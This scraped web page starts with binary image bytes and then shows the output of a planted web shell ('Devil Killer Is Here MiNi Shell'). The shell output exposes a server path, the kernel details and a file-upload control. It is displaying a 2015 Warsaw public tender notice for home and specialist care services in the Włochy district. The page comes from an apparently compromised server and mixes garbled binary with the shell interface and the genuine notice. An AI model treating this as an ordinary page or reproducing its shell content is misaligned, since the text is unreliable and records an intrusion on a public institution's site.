JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151026/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20151026/284572-N-2015.html

<p class="kh_header"><b>Warszawa: Świadczenie usług opiekuńczych oraz specjalistycznych usług opiekuńczych dla osób korzystających z pomocy Ośrodka Pomocy Społecznej Dzielnicy Włochy m. st. Warszawy</b><br>
<b>Numer ogłoszenia: 284572 - 2015; data zamieszczenia: 26.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej Dzielnicy Włochy m.st. Warszawy , Ul. Czereśniowa 35, 02-457 Warszawa, woj. mazowieckie, tel. 022 8639837, faks 022 8639837 w. 110.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług opiekuńczych oraz specjalistycznych usług opiekuńczych dla osób korzystających z pomocy Ośrodka Pomocy Społecznej Dzielnicy Włochy m. st. Warszawy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie przez Wykonawcę usług opiekuńczych oraz specjalistycznych usług opiekuńczych przyznanych na podstawie art. 50 ustawy z dnia 12 marca 2004 r. o pomocy społecznej (Dz. U. z 2015 r., poz. 163 ze. zm.) - na rzecz osób korzystających z pomocy Ośrodka Pomocy Społecznej Dzielnicy Włochy m. st. Warszawy, zamieszkałych na terenie Dzielnicy Włochy m.st. Warszawy - wskazanych przez Zamawiającego, zwanych dalej Świadczeniobiorcami lub zamiennie osobami korzystającymi z Usług.
2.Usługi, o których mowa w pkt 3.2., zwane dalej Usługami, obejmują usługi opiekuńcze oraz specjalistyczne usługi opiekuńcze świadczone na rzecz osób samotnych, które z powodu wieku, choroby lub innych przyczyn wymagają pomocy innych osób, a są jej pozbawione oraz osób, które wymagają pomocy innych osób, a rodzina, a także wspólnie zamieszkujący małżonek, wstępni, zstępni nie mogą takiej pomocy zapewnić.
3.Świadczenie Usług odbywać się będzie codziennie przez  siedem dni w tygodniu,  w tym w niedziele i święta, w okresie od dnia 01.12.2015 r. do dnia 30.11.2017 r.
4.Miejscem świadczenia Usług będzie miejsce zamieszkania świadczeniobiorców, położone na obszarze Dzielnicy Włochy m. st. Warszawy.
5.Szczegółowy zakres Usług opisany jest w pkt 3.12-13 SIWZ.
6.Szacunkowa liczba godzin Usług w okresie objętym Zamówieniem, tj. w okresie  od dnia 01.12.2015 r., tj. od dnia rozpoczęcia świadczenia Usług do dnia 30.11.2017 r., wynosi:
1)23900,00 godzin - usług opiekuńczych, w tym: 
a)900 godzin w 2015 r.;
b)12000 godzin w 2016 r.;
c)11000 godzin w 2017 r;
2)13935 godzin - specjalistycznych usług opiekuńczych, w tym: 
a)485 godzin   2015 r.; 
b)6960 godzin w 2016 r. 
c)6490 godzin w 2017 r.
7.Zamawiający zastrzega sobie prawo kontroli realizacji Zamówienia przez Wykonawcę, w tym: kontroli merytorycznej, obejmującej kontrolę zgodności świadczonych usług z warunkami umowy - w miejscu świadczenia Usług w miejscu zamieszkania osób, na rzecz których świadczone są Usługi oraz kontroli dokumentów Wykonawcy prowadzonych w powyższym zakresie, w tym w siedzibie Wykonawcy.    W ramach prawa do kontroli, o której mowa wyżej, Zamawiającemu przysługuje prawo do:                                                                                                       
1)bezpośrednich kontaktów z osobami, przy pomocy których Wykonawca świadczy Usługi (pracownikami-personelem Wykonawcy) oraz prawo przekazywania tym osobom uwag i spostrzeżeń dotyczących prawidłowości świadczonych Usług,
2)występowania do Wykonawcy o zmianę osób-osoby wykonującej Usługi.
8.Zamawiający wskaże Wykonawcy osoby uprawnione do korzystania z Usług, określając jednocześnie następujące, wskazane poniżej, dane tych osób oraz informacje o zakresie Usług przyznanych indywidualnie poszczególnym osobom:  
1)imię,  nazwisko oraz adres;
2)rodzaj przyznanych Usług; 
3)ilość godzin przyznanych usług;
4)czas na jaki Usługi zostały przyznane; 
5)stawkę odpłatności za jedną godzinę Usług, jaką zobowiązana jest ponosić osoba korzystająca z Usług zgodnie z decyzją Zamawiającego ws. przyznania Usług; 
6)zalecenia lekarza dotyczące zakresu świadczonych Usług - w przypadku wydania takich zaleceń.
9.Wykonawca zobowiązuje się do rozpoczęcia świadczenia Usług na rzecz poszczególnych osób wskazanych przez Zamawiającego, na podstawie odrębnego pisemnego zlecenia Zamawiającego, od dnia wskazanego w tym zleceniu.
10.W wyjątkowych i nagłych wypadkach dopuszcza się możliwość ustnego/telefonicznego zlecenia Usług przez Zamawiającego, jak też możliwość ustnego poinformowania Wykonawcy o przerwaniu świadczenia Usług w odniesieniu do poszczególnych osób - wskazanych przez Zamawiającego, co wymaga bezzwłocznego potwierdzenia pisemnym zleceniem lub informacją Zamawiającego z doręczeniem Wykonawcy.
11.Szczegółowy zakres usług opiekuńczych:
1)podstawowa pomoc w czynnościach życia codziennego oraz załatwianiu bieżących spraw, w tym:
a)zakupy podstawowych artykułów spożywczych, przemysłowych, higienicznych, realizacja recept, inne zlecone przez osobę korzystającą  z usług - dokonywane w najbliższej okolicy miejsca zamieszkania osoby korzystającej z usługi;
b)przygotowywanie posiłków (także dietetycznych), z zabezpieczeniem co najmniej raz dziennie gorącego posiłku, 
c)pomoc przy spożywaniu posiłków,
d)mycie naczyń,
e)sprzątanie (bez mycia okien i prania dywanów) pokoju osoby korzystającej z usług, w tym sprzątanie kuchni, łazienki i urządzeń sanitarnych, 
f)zmiana odzieży, bielizny osobistej i pościelowej,
g)oddawanie odzieży oraz bielizny pościelowej do pralni i jej odbiór,
h)pranie bielizny osobistej i lekkiej odzieży, prasowanie,
i)wynoszenie śmieci,
j)przynoszenie wody, węgla i palenie w piecu - w przypadku takiej konieczności,
k)załatwianie bieżących spraw urzędowych, w tym wnoszenie opłat, wysyłanie korespondencji, zgłaszanie napraw urządzeń domowego użytku  i sprzętu, wymiana książek w bibliotece,
l)pomoc w prowadzeniu gospodarstwa domowego,
m)zamawianie wizyt w placówkach zdrowia oraz pomoc w dostaniu się do placówek służby zdrowia oraz do placówek rehabilitacyjnych;
2)podstawowa opieka:
a)podawanie leków wg zaleceń lekarza,
b)dbałość o kondycję psychoruchową oraz zapewnienie kontaktu z otoczeniem  poprzez:
b.a)organizowanie spacerów, 
b.b)prowadzenie rozmów,
b.c)czytanie prasy, książek, 
b.d)pomoc w prowadzeniu korespondencji,
b.e)stały kontakt z rodziną osoby korzystającej z Usług, 
b.f)towarzyszenie osobom korzystającą z usług w urzędach i placówkach kulturalnych,
b.g)dbałość o bezpieczeństwo osób korzystających z usług podczas wykonywania czynności życia codziennego,
b.h)odwiedzanie osoby samotnej w przypadku jej pobytu  w szpitalu;
3)współpraca:
a)utrzymywanie stałego kontaktu z pracownikiem socjalnym Zamawiającego,  oraz z lekarzem i pielęgniarką środowiskową w sprawach osoby korzystającej z usług;
b)informowanie pracownika socjalnego Zamawiającego o wszelkich zmianach stanu zdrowia osoby korzystającej z usług oraz o jej potrzebach w zakresie dodatkowej pomocy społecznej, a także o nieobecności w miejscu zamieszkania, skierowaniu do szpitala i innych zdarzeniach mających wpływ na sytuację i przebieg wykonywania usług.
12.Szczegółowy zakres specjalistycznych usług opiekuńczych:
1)uczenie osób korzystających z usług i rozwijanie umiejętności tych osób niezbędnych do samodzielnego życia, w tym zwłaszcza:
a)kształtowanie umiejętności zaspokajania podstawowych potrzeb życiowych i umiejętności społecznego funkcjonowania, motywowanie do aktywności, leczenia i rehabilitacji, prowadzenie treningów umiejętności samoobsługi i umiejętności społecznych oraz wspieranie, także w formie asystowania w codziennych czynnościach życiowych, w szczególności takich jak:
a.a) samoobsługa, zwłaszcza wykonywanie czynności gospodarczych i
  porządkowych, w tym umiejętność utrzymania i prowadzenia 
 gospodarstwa domowego,
a.b) dbałość o higienę i wygląd,
a.c) utrzymywanie kontaktów z domownikami, rówieśnikami, w miejscu nauki  i pracy oraz ze społecznością lokalną,
a.d) wspólne organizowanie i spędzanie czasu wolnego,
a.e) korzystanie z usług różnych instytucji,
b)interwencje i pomoc w życiu w rodzinie, w tym:
b.a) pomoc w radzeniu sobie w sytuacjach kryzysowych - poradnictwo      specjalistyczne, interwencje kryzysowe, wsparcie psychologiczne, rozmowy terapeutyczne,
b.b) ułatwienie dostępu do edukacji i kultury,
b.c) doradztwo, koordynacja działań innych służb na rzecz rodziny, której członkiem jest osoba uzyskująca pomoc w formie specjalistycznych usług,
b.d) kształtowanie pozytywnych relacji osoby wspieranej z osobami bliskimi,
b.e) współpraca z rodziną - kształtowanie odpowiednich postaw wobec osoby chorującej, niepełnosprawnej,
c)pomoc w załatwianiu spraw urzędowych, w tym:
c.a)  w uzyskaniu świadczeń socjalnych, emerytalno-rentowych,
c.b) w wypełnieniu dokumentów urzędowych,
d)pomoc w gospodarowaniu pieniędzmi, w tym:
d.a)nauka planowania budżetu, asystowanie przy ponoszeniu wydatków,
d.b) pomoc w uzyskaniu ulg w opłatach,
d.c) zwiększanie umiejętności gospodarowania własnym budżetem oraz usamodzielnianie finansowe;
2)pielęgnacja - jako wspieranie procesu leczenia, w tym:
a)pomoc w dostępie do świadczeń zdrowotnych,
b)uzgadnianie i pilnowanie terminów wizyt lekarskich i badań diagnostycznych,
c)pomoc w zakupie lub zamawianiu leków w aptece,
d)nadzór nad przyjmowaniem leków oraz obserwowanie ewentualnych skutków ubocznych ich stosowania i zgłaszanie tych skutków,
e)w szczególnie uzasadnionych przypadkach zmiana opatrunków, pomoc w użyciu środków pomocniczych i materiałów medycznych, przedmiotów ortopedycznych, a także w utrzymaniu higieny,
f)pomoc w dotarciu do placówek służby zdrowia oraz placówek rehabilitacyjnych zgodnie z zaleceniami lekarskimi lub specjalisty  z zakresu rehabilitacji ruchowej lub fizjoterapii;
3)pomoc mieszkaniowa, w tym w:
a)uzyskaniu mieszkania, negocjowaniu i wnoszeniu opłat-czynszu,
b)organizacji drobnych remontów, adaptacji, napraw, likwidacji barier architektonicznych,
c)kształtowaniu właściwych relacji osoby korzystającej z usług z sąsiadami oraz zarządcami lokalu; 
4)współpraca:
a)utrzymywanie stałego kontaktu z pracownikiem socjalnym Zamawiającego, z lekarzem i  pielęgniarką środowiskową,
b)informowanie pracownika socjalnego Zamawiającego o wszelkich zmianach stanu zdrowia osoby korzystającej z usług oraz o jej potrzebach w zakresie dodatkowej pomocy społecznej, a także o nieobecności w miejscu zamieszkania, skierowaniu do szpitala i innych zdarzeniach mających wpływ na sytuację i przebieg wykonywania usług,
c)współpraca ze specjalistami w zakresie wspierania psychologiczno-pedagogicznego i edukacyjno-terapeutycznego zmierzająca do wielostronnej aktywizacji osoby korzystającej z usług.
13.Wykonawca jest odpowiedzialny za wykonanie wszystkich obowiązków wchodzących w zakres Usług, zgodnie z Zamówieniem. 
14.Do świadczenia Usług Wykonawca zobowiązany jest zatrudnić osoby sprawne fizycznie i intelektualnie, zdolne do wykonywania prac fizycznych, posiadające umiejętność utrzymywania prawidłowych kontaktów interpersonalnych.
15.Wykonawca zapewni świadczenie usług opiekuńczych przez osoby odpowiednio przeszkolone, tj. posiadające ukończony kurs-szkolenie w zakresie opieki nad chorym w domu, opieki nad osobami starszymi - w zakresie wykonywania Usług objętych Zamówieniem. 
16.Wykonawca zapewni świadczenie specjalistycznych usług opiekuńczych przez osoby posiadające kwalifikacje do wykonywania zawodu: pracownika socjalnego, psychologa, pedagoga, logopedy, terapeuty zajęciowego, pielęgniarki, asystenta osoby niepełnosprawnej, opiekunki środowiskowej, specjalisty w zakresie rehabilitacji medycznej, fizjoterapeuty lub innego zawodu dającego wiedzę i umiejętności pozwalające świadczyć określone specjalistyczne usługi.
17.Wykonawca zapewni w ramach swojego personelu - koordynatora usług świadczonych przez osoby realizujące Usługi bezpośrednio u osób korzystających  z Usług, upoważnionego jednocześnie do stałych kontaktów z Zamawiającym w zakresie realizacji Usług. 
18.Zamawiający w oparciu o art. 29 ust. 4 pkt 4 uPzp wymaga aby Wykonawca (lub podwykonawca) zatrudnił przy realizacji Zamówienia w ramach swojego personelu - koordynatora usług - na podstawie umowy o pracę w wymiarze czasu pracy nie mniejszym niż ? etatu, z zastrzeżeniem warunków określonych we wzorze umowy stanowiącym załącznik nr 7 do SIWZ.
19.Wykonawca ponosi odpowiedzialność za zachowanie staranności w wyborze osób, przy pomocy których będzie świadczył Usługi oraz prawidłowość wykonywanych przez nie czynności i obowiązków w powyższym zakresie.
20.Wykonawca wskaże Zamawiającemu numery telefonów kontaktowych i numer faksu Wykonawcy, inne informacje niezbędne dla sprawnego i terminowego wykonania Zamówienia.
21.Wykonawca ponosi wobec osób korzystających z Usług odpowiedzialność za szkody wyrządzone przez Wykonawcę w związku ze świadczeniem Usług, w tym przez osoby, przy pomocy których Wykonawca realizuje Zamówienie.  Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę w związku z realizacją Zamówienia.
22.W chwili zawarcia Umowy o wykonanie Zamówienia - Wykonawca zobowiązany jest do przedstawienia Zamawiającemu - dokumentów potwierdzających;
1)uprawnienia pracowników-personelu Wykonawcy, który będzie świadczył usługi opiekuńcze - wynikające z warunków określonych w SIWZ;
2)uprawnienia pracowników-personelu Wykonawcy, który będzie świadczył specjalistyczne usługi opiekuńcze - wynikające z przepisów rozporządzenia;
3)zatrudnienie pracownika - koordynatora Usług na podstawie umowy o pracę. 
23.Warunki określone w pkt 3.23 powyżej, obowiązują także w przypadku zmiany pracowników-personelu wskazanych odpowiednio w pkt 1, 2 i 3 w trakcie trwania realizacji Zamówienia. 
24.Wykonawca zobowiązany jest wskazać, które części zamówienia zamierza zlecić podwykonawcom..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający informuje, że przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67. ust. 1 pkt 6 uPzp do wysokości 10% zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.11.00-3, 85.31.12.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie żąda  wniesienia wadium przez Wykonawców</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza i nie opisuje szczegółowo warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony, jeżeli Wykonawca: a) wykaże w formie oświadczenia złożonego przez Wykonawcę zgodnie ze wzorem określonym w Załączniku Nr 4 do SIWZ, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał z należytą starannością, co najmniej dwa zamówienia porównywalne co do charakteru i wielkości każdego z nich z zamówieniem objętym niniejszym postępowaniem, z zastrzeżeniem, że za wartość porównywalną uznawana będzie przez Zamawiającego wartość każdej usługi nie mniejsza niż 50% wielkości Zamówienia, i jednocześnie przedłoży wraz z ofertą dowody potwierdzające, że usługi w  zakresie określonym pod lit. a) zostały wykonane lub są wykonywane należycie,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza i nie opisuje szczegółowo warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie uznany za spełniony -  jeżeli Wykonawca oświadczeniem złożonym według wzoru określonego w załączniku Nr 5 do SIWZ, złożonym wraz z ofertą Wykonawcy (załączonym do formularza oferty), wykaże, że osoby, które będą uczestniczyć w wykonywaniu Zamówienia posiadają wymagane uprawnienia: a) w zakresie świadczenia usług opiekuńczych - wymagane warunkami określonymi w  SIWZ, b) w zakresie specjalistycznych usług opiekuńczych - określone przepisami  rozporządzenia Ministra Polityki Społecznej z dnia 22 września 2005 r. w sprawie  specjalistycznych usług opiekuńczych   (Dz. U.  Nr 189, poz. 1598 ze zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany  za spełniony jeżeli Wykonawca - wykaże stosownym dokumentem, załączonym do  formularza Oferty, że posiada opłaconą polisę ubezpieczenia od odpowiedzialności  cywilnej w zakresie prowadzonej przez niego działalności na kwotę nie mniejszą niż 200.000,00 zł. (opłacona polisa), a w przypadku jej braku - innym dokumentem potwierdzającym, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej przez niego działalności na kwotę nie mniejszą niż 200.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

